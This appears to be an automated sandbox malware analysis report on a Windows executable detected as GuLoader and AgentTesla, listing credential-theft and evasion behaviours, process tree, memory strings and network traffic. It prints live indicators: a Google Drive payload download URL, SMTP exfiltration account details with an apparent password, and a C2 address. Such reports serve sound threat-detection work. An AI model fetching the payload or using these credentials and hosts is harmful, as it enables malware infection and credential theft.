Play interactive tour

Edit tour

Windows Analysis Report justificante de la transfer.exe

Overview

General Information

Sample Name:	justificante de la transfer.exe
Analysis ID:	526293
MD5:	e565201ac69a8a2fa7ee22e0809f7b3c
SHA1:	fed196aeff9aca57c198b0b99a9c9bc6e01d31b9
SHA256:	b6fad861abae70b69d7f0ef4e51756b181149e165ada09aee47e3d2bd5f9a0c6
Infos:
Most interesting Screenshot:

Detection

AgentTesla GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

Yara detected GuLoader

Hides threads from debuggers

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to detect Any.run

Tries to harvest and steal ftp login credentials

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

C2 URLs / IPs found in malware configuration

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Drops certificate files (DER)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

PE file contains strange resources

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

Uses SMTP (mail sending)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64native

justificante de la transfer.exe (PID: 6424 cmdline: "C:\Users\user\Desktop\justificante de la transfer.exe" MD5: E565201AC69A8A2FA7EE22E0809F7B3C)

CasPol.exe (PID: 6828 cmdline: "C:\Users\user\Desktop\justificante de la transfer.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)

CasPol.exe (PID: 8676 cmdline: "C:\Users\user\Desktop\justificante de la transfer.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)

conhost.exe (PID: 8684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "arealaboral@neopyme.comnJm038qQkPmail.neopyme.combernardkincaid01@gmail.com"}

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?exporto"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
0000000B.00000000.761549812.0000000000B00000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
0000000B.00000002.5698566884.000000001DC81000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000B.00000002.5698566884.000000001DC81000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.933649087.0000000002300000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: CasPol.exe PID: 8676	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: CasPol.exe PID: 8676	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0000000B.00000000.761549812.0000000000B00000.00000040.00000001.sdmp	Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?exporto"}
Source: conhost.exe.8684.12.memstrmin	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "arealaboral@neopyme.comnJm038qQkPmail.neopyme.combernardkincaid01@gmail.com"}

Multi AV Scanner detection for submitted file

Show sources

Source: justificante de la transfer.exe	Virustotal: Detection: 22%			Perma Link
Source: justificante de la transfer.exe	ReversingLabs: Detection: 11%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00E2C130 CryptUnprotectData,		11_2_00E2C130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00E2C7D3 CryptUnprotectData,		11_2_00E2C7D3

Source: justificante de la transfer.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown	HTTPS traffic detected: 142.250.185.110:443 -> 192.168.11.20:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.225:443 -> 192.168.11.20:49757 version: TLS 1.2

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://drive.google.com/uc?exporto

Source: Joe Sandbox View

ASN Name: OVHFR OVHFR

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Joe Sandbox View

IP Address: 54.36.109.179 54.36.109.179

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1Bi-sjR4KzfRIPfdPNOxJn3S8BMnh3zRT HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/cbqvfrinn52haphefl414ecufsqsvklm/1637586450000/17803878832083720643/*/1Bi-sjR4KzfRIPfdPNOxJn3S8BMnh3zRT?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0s-b8-docs.googleusercontent.comConnection: Keep-Alive

Source: global traffic

TCP traffic: 192.168.11.20:49775 -> 54.36.109.179:587

Source: global traffic

TCP traffic: 192.168.11.20:49775 -> 54.36.109.179:587

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: CasPol.exe, 0000000B.00000002.5699329145.000000001DCD2000.00000004.00000001.sdmp

String found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C

Source: CasPol.exe, 0000000B.00000002.5698566884.000000001DC81000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 0000000B.00000002.5698566884.000000001DC81000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: CasPol.exe, 0000000B.00000002.5699329145.000000001DCD2000.00000004.00000001.sdmp	String found in binary or memory: http://YacheoH9CTlBmpI1K.com
Source: CasPol.exe, 0000000B.00000002.5699329145.000000001DCD2000.00000004.00000001.sdmp	String found in binary or memory: http://YacheoH9CTlBmpI1K.comt
Source: CasPol.exe, 0000000B.00000002.5699329145.000000001DCD2000.00000004.00000001.sdmp	String found in binary or memory: http://YacheoH9CTlBmpI1K.comt-
Source: CasPol.exe, 0000000B.00000002.5677098382.0000000000F47000.00000004.00000020.sdmp	String found in binary or memory: http://cps.letsencrypt.org0
Source: CasPol.exe, 0000000B.00000003.1883579517.000000002102C000.00000004.00000010.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: CasPol.exe, 0000000B.00000003.910118192.0000000000F6A000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: CasPol.exe, 0000000B.00000002.5706986424.000000001FDE0000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: CasPol.exe, 0000000B.00000002.5677591920.0000000000F56000.00000004.00000020.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.11.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: CasPol.exe, 0000000B.00000002.5706986424.000000001FDE0000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabkS
Source: CasPol.exe, 0000000B.00000003.1879317771.000000001FEBA000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?8028f1dafc
Source: CasPol.exe, 0000000B.00000002.5701328362.000000001DDA3000.00000004.00000001.sdmp	String found in binary or memory: http://mail.neopyme.com
Source: CasPol.exe, 0000000B.00000002.5701328362.000000001DDA3000.00000004.00000001.sdmp	String found in binary or memory: http://neopyme.com
Source: CasPol.exe, 0000000B.00000002.5698566884.000000001DC81000.00000004.00000001.sdmp	String found in binary or memory: http://pYhQFb.com
Source: CasPol.exe, 0000000B.00000002.5677098382.0000000000F47000.00000004.00000020.sdmp	String found in binary or memory: http://r3.i.lencr.org/09
Source: CasPol.exe, 0000000B.00000002.5677098382.0000000000F47000.00000004.00000020.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: CasPol.exe, 0000000B.00000002.5677098382.0000000000F47000.00000004.00000020.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: CasPol.exe, 0000000B.00000002.5676049058.0000000000F27000.00000004.00000020.sdmp, CasPol.exe, 0000000B.00000002.5710155753.000000002102A000.00000004.00000010.sdmp, 2D85F72862B55C4EADD9E66E06947F3D0.11.dr	String found in binary or memory: http://x1.i.lencr.org/
Source: CasPol.exe, 0000000B.00000002.5677098382.0000000000F47000.00000004.00000020.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: CasPol.exe, 0000000B.00000002.5710155753.000000002102A000.00000004.00000010.sdmp	String found in binary or memory: http://x1.i.lencr.org/U
Source: CasPol.exe, 0000000B.00000003.1879317771.000000001FEBA000.00000004.00000001.sdmp	String found in binary or memory: http://x1.i.lencr.org:80/
Source: CasPol.exe, 0000000B.00000003.904616144.0000000000F6A000.00000004.00000001.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: CasPol.exe, 0000000B.00000003.904616144.0000000000F6A000.00000004.00000001.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
Source: CasPol.exe, 0000000B.00000003.910118192.0000000000F6A000.00000004.00000001.sdmp	String found in binary or memory: https://doc-0s-b8-docs.googleusercontent.com/
Source: CasPol.exe, 0000000B.00000002.5677591920.0000000000F56000.00000004.00000020.sdmp	String found in binary or memory: https://doc-0s-b8-docs.googleusercontent.com/&/
Source: CasPol.exe, 0000000B.00000003.910118192.0000000000F6A000.00000004.00000001.sdmp	String found in binary or memory: https://doc-0s-b8-docs.googleusercontent.com/-
Source: CasPol.exe, 0000000B.00000003.904616144.0000000000F6A000.00000004.00000001.sdmp	String found in binary or memory: https://doc-0s-b8-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/cbqvfrin
Source: CasPol.exe, 0000000B.00000002.5674515926.0000000000EE6000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/
Source: CasPol.exe, 0000000B.00000002.5674515926.0000000000EE6000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/T
Source: CasPol.exe, 0000000B.00000002.5671286322.0000000000D00000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1Bi-sjR4KzfRIPfdPNOxJn3S8BMnh3zRT
Source: CasPol.exe, 0000000B.00000002.5676049058.0000000000F27000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1Bi-sjR4KzfRIPfdPNOxJn3S8BMnh3zRT6
Source: CasPol.exe, 0000000B.00000003.904616144.0000000000F6A000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1Bi-sjR4KzfRIPfdPNOxJn3S8BMnh3zRT6MSuMCoPhcuIw3UZ4
Source: CasPol.exe, 0000000B.00000002.5699329145.000000001DCD2000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.5700265223.000000001DD36000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/
Source: CasPol.exe, 0000000B.00000002.5699329145.000000001DCD2000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com//
Source: CasPol.exe, 0000000B.00000002.5699329145.000000001DCD2000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/https://login.live.com/
Source: CasPol.exe, 0000000B.00000002.5699329145.000000001DCD2000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/v104
Source: CasPol.exe, 0000000B.00000002.5700265223.000000001DD36000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: CasPol.exe, 0000000B.00000002.5698566884.000000001DC81000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1Bi-sjR4KzfRIPfdPNOxJn3S8BMnh3zRT HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/cbqvfrinn52haphefl414ecufsqsvklm/1637586450000/17803878832083720643/*/1Bi-sjR4KzfRIPfdPNOxJn3S8BMnh3zRT?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0s-b8-docs.googleusercontent.comConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 142.250.185.110:443 -> 192.168.11.20:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.225:443 -> 192.168.11.20:49757 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

Jump to dropped file

Source: justificante de la transfer.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00A004A0	11_2_00A004A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00A05960	11_2_00A05960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00A0A200	11_2_00A0A200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00A04A28	11_2_00A04A28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00A4C080	11_2_00A4C080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00A44320	11_2_00A44320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00A4BA48	11_2_00A4BA48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00A43A50	11_2_00A43A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00A41120	11_2_00A41120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00A43708	11_2_00A43708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00AC6D90	11_2_00AC6D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00AC07E0	11_2_00AC07E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00DFB458	11_2_00DFB458
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00DFEAC0	11_2_00DFEAC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00DF8612	11_2_00DF8612
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00DF5B91	11_2_00DF5B91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00DF44F8	11_2_00DF44F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00DF3330	11_2_00DF3330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00E25072	11_2_00E25072
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00E235A0	11_2_00E235A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00E2EAB8	11_2_00E2EAB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00E29348	11_2_00E29348
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00E24738	11_2_00E24738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00E21C28	11_2_00E21C28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00E29D44	11_2_00E29D44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_1DA35E08	11_2_1DA35E08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_1DA346C4	11_2_1DA346C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_1DA35DC3	11_2_1DA35DC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_1DA36AF1	11_2_1DA36AF1

Source: C:\Users\user\Desktop\justificante de la transfer.exe

Code function: 0_2_023064CB NtWriteVirtualMemory,

0_2_023064CB

Source: justificante de la transfer.exe, 00000000.00000000.611730099.0000000000445000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameCappuccino.exe vs justificante de la transfer.exe
Source: justificante de la transfer.exe	Binary or memory string: OriginalFilenameCappuccino.exe vs justificante de la transfer.exe

Source: justificante de la transfer.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: justificante de la transfer.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\justificante de la transfer.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: edgegdi.dll			Jump to behavior

Source: justificante de la transfer.exe	Virustotal: Detection: 22%
Source: justificante de la transfer.exe	ReversingLabs: Detection: 11%

Source: justificante de la transfer.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\justificante de la transfer.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\justificante de la transfer.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\justificante de la transfer.exe "C:\Users\user\Desktop\justificante de la transfer.exe"
Source: C:\Users\user\Desktop\justificante de la transfer.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\justificante de la transfer.exe"
Source: C:\Users\user\Desktop\justificante de la transfer.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\justificante de la transfer.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\justificante de la transfer.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\justificante de la transfer.exe"	Jump to behavior
Source: C:\Users\user\Desktop\justificante de la transfer.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\justificante de la transfer.exe"	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

Jump to behavior

Source: C:\Users\user\Desktop\justificante de la transfer.exe

File created: C:\Users\user\AppData\Local\Temp\~DFC7BBBE7FAB9778BB.TMP

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/6@4/4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8684:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8684:120:WilError_03

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: 0000000B.00000000.761549812.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.933649087.0000000002300000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\justificante de la transfer.exe	Code function: 0_2_00406467 push esi; iretd	0_2_00406468
Source: C:\Users\user\Desktop\justificante de la transfer.exe	Code function: 0_2_00404E11 push eax; ret	0_2_00404E19
Source: C:\Users\user\Desktop\justificante de la transfer.exe	Code function: 0_2_00403CFC push cs; retf	0_2_00403D26
Source: C:\Users\user\Desktop\justificante de la transfer.exe	Code function: 0_2_004045D2 push cs; iretd	0_2_004045ED
Source: C:\Users\user\Desktop\justificante de la transfer.exe	Code function: 0_2_00404B97 push eax; retf	0_2_00404B99
Source: C:\Users\user\Desktop\justificante de la transfer.exe	Code function: 0_2_00404DB7 push cs; retf	0_2_00404DBB
Source: C:\Users\user\Desktop\justificante de la transfer.exe	Code function: 0_2_02303A4B push ebx; iretd	0_2_02303AB5
Source: C:\Users\user\Desktop\justificante de la transfer.exe	Code function: 0_2_02307AF8 pushfd ; iretd	0_2_02307AF9
Source: C:\Users\user\Desktop\justificante de la transfer.exe	Code function: 0_2_02301BC0 push 53B0A25Ah; iretd	0_2_02301BC5
Source: C:\Users\user\Desktop\justificante de la transfer.exe	Code function: 0_2_0230803B push ds; ret	0_2_0230805D
Source: C:\Users\user\Desktop\justificante de la transfer.exe	Code function: 0_2_02300825 push ebx; retf	0_2_0230086D
Source: C:\Users\user\Desktop\justificante de la transfer.exe	Code function: 0_2_023000E8 push eax; iretd	0_2_023000EB
Source: C:\Users\user\Desktop\justificante de la transfer.exe	Code function: 0_2_023009F3 push ebx; iretd	0_2_023009F5
Source: C:\Users\user\Desktop\justificante de la transfer.exe	Code function: 0_2_023009FB push ebx; iretd	0_2_023009F5
Source: C:\Users\user\Desktop\justificante de la transfer.exe	Code function: 0_2_023051E6 push ebx; iretd	0_2_023051F1
Source: C:\Users\user\Desktop\justificante de la transfer.exe	Code function: 0_2_02302E2F push edx; iretd	0_2_02302E31
Source: C:\Users\user\Desktop\justificante de la transfer.exe	Code function: 0_2_02303670 push ebx; retf	0_2_02303671
Source: C:\Users\user\Desktop\justificante de la transfer.exe	Code function: 0_2_023076E1 push 26441584h; iretd	0_2_02307713
Source: C:\Users\user\Desktop\justificante de la transfer.exe	Code function: 0_2_023036DC push ebx; retf	0_2_023036DD
Source: C:\Users\user\Desktop\justificante de la transfer.exe	Code function: 0_2_0230472B push es; retf	0_2_0230472D
Source: C:\Users\user\Desktop\justificante de la transfer.exe	Code function: 0_2_0230078D push eax; iretd	0_2_02300793
Source: C:\Users\user\Desktop\justificante de la transfer.exe	Code function: 0_2_02304454 pushfd ; retf	0_2_02304455
Source: C:\Users\user\Desktop\justificante de la transfer.exe	Code function: 0_2_0230644C push ds; ret	0_2_02306469
Source: C:\Users\user\Desktop\justificante de la transfer.exe	Code function: 0_2_02300D1B push ebx; iretd	0_2_02300D81
